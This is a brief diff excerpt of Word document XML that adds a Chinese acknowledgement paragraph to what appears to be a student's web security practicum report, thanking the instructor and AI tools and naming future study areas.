+              <w:t>感谢实训指导教师陈腾老师的指导以及 AI 辅助工具的支持。本次实训让我从一个对 Web 安全仅有模糊概念的学生，成长为能够独立完成漏洞发现、分析、修复及报告撰写的准安全从业者。未来我将继续深入学习容器安全、移动安全、DevSecOps 等进阶方向，不断提升专业能力。</w:t>
+            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
